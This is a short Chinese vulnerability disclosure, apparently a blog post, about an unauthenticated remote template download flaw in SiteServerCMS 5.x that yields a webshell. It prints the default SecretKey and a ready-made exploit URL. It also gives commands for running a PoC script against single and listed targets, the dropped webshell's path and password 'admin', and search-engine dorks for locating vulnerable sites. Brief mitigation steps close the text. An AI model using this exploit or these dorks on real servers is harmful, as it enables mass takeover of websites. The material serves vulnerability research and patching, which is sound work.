SiteServerCMS-Remote-download-Getshell-vulnerability
SiteServerCMS 远程模板下载Getshell漏洞
avatar
漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStringBySecretKey函数将downloadurl先进行了解密,之后调用SiteTemplateDownload函数进行模板下载并自解压。
且SecretKey在5.0是默认值
vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5
References
Author:1u0hun
简记野生应急捕获到的siteserver远程模板下载Getshell漏洞
Affected Version
SiteServerCMS 5.x
SiteServerCMS 4.x(测试没通过)
PoC
Author:We1h0@PoxTeam
http://localhost/SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=aZlBAFKTavCnFX10p8sNYfr9FRNHM0slash0XP8EW1kEnDr4pNGA7T2XSz0yCY0add0MS3NiuXiz7rZruw8zMDybqtdhCgxw7u0ZCkLl9cxsma6ZWqYd0G56lB6242DFnwb6xxK4AudqJ0add0gNU9tDxOqBwAd37smw0equals00equals0&directoryName=sectest
python2 poc.py -u http://localhost
avatar
python2 poc.py -f url.txt
Ps:注意最后面没/
WebShell:http://localhost/SiteFiles/SiteTemplates/sectest/include.aspx
PassWord:admin
搜索引擎关键字:
inurl:/sitefiles/services
inurl:/sitesever/login.aspx
临时修复方案
修改
1.C:/WebSite/SiteFiles/Configuration/Configuration.config
secretKey的值
2.更改后台地址
3.更改(或移除模板下载功能)/SiteServer/Ajax/ajaxOtherService.aspx路径
京公网安备 11010502034610号
暂无评论